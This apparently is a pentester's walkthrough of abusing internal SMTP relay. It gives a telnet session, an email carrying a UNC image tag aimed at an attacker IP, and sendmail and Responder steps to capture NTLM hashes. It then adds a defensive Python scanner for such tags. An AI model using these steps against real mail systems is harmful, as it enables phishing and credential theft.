SMTP Internal UNC Relay Exploit

A quick walkthrough of how to exploit internal relay via SMTP. This bypasses the common Outlook restriction that blocks automatic downloading of images, so when you identify a vulnerable target it can result in easy hash collection.

telnet IP-Address 25

Trying IP-Address…

Connected to IP-Address.

Escape character is '^]'.

220 ************************************************************************************************

HELO

250 Domain.domain-name-co.uk Hello [IP-Address]

MAIL FROM:name@domain-name-co.uk

250 1.1.0 Sender OK

RCPT TO: internal.name@domain-name-co.uk

250 1.1.5 Recipient OK

DATA

354 Start mail input; end with <CRLF>.<CRLF>

Please email me (Add address) if you receive this?

.

250 1.6.0 <internal.name@domain-name.co.uk> [Internal ID=221411] Queued mail for delivery

——————

It’s a little tricky to end the message while testing, but <CRLF>.<CRLF> just means: press Enter, type a full stop (.), press Enter.

If you see "Queued mail for delivery", this is a great sign, as it indicates that the target is vulnerable to internal SMTP relay.

1. Write your email and save it as .htm (to do this I use Outlook to create the email, send it to myself and save it as a .htm).

2. Open the .htm file in Notepad++ and delete all sections that are not required.

3. Add the UNC image tag on the last line of the email, just before </body>:

</div>

<img src="file:///\\IP-Address/test">

</body>

</html>

Then, to send the email, you can use any method that accepts .htm emails and supports relay. I commonly use @strawp's sendmail script.

4. Use the sendmails.py script from https://github.com/strawp/random-scripts

5. Set up Responder.

6. Send the email using the sendmail script; syntax below.

python sendmails.py -g SMTP-IP-Address -p 25 -e Email-address -b UNCPic.htm -f internal.name@domain-name-co.uk -s question
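
On the receiving side, the file:/// UNC image tag from step 3 is something a mail gateway or triage script can look for. The Python below is an added example, not part of the original post or of strawp's scripts; it flags text/html parts whose src, href or background attributes point at a file: URL or a UNC path. The sample message, the function names and the address 192.0.2.10 are constructed for illustration.

```python
import re
from email import message_from_string
from html.parser import HTMLParser

# Attributes that can make a mail client fetch a resource while rendering.
URL_ATTRS = {"src", "href", "background"}
# file: URLs, plus values starting with two slashes or backslashes (UNC style).
UNC_RE = re.compile(r"^\s*(?:file:[\\/]{2,}|[\\/]{2})[^\\/\s]", re.I)

# Constructed sample message; 192.0.2.10 is a documentation-only address.
SAMPLE = (
    "Subject: question\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    '<html><body><div>Hi</div><img src="https://example.test/logo.png">'
    '<img src="file:///\\\\192.0.2.10/test"></body></html>\r\n'
)


class UncRefFinder(HTMLParser):
    """Collects (tag, attribute, value) for each UNC or file: reference."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):  # also called for <img ... />
        for name, value in attrs:
            if name in URL_ATTRS and value and UNC_RE.match(value):
                self.hits.append((tag, name, value))


def find_unc_refs(html):
    finder = UncRefFinder()
    finder.feed(html)
    finder.close()
    return finder.hits


def scan_message(raw):
    """Return the references found in every text/html part of a raw message."""
    hits = []
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            body = part.get_payload(decode=True) or b""
            charset = part.get_content_charset() or "utf-8"
            hits += find_unc_refs(body.decode(charset, "replace"))
    return hits
```

Calling scan_message(SAMPLE) returns the single file:/// image reference and ignores the https one; a non-empty result is a reason to quarantine the message or strip the tag before delivery.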

@myexploit2600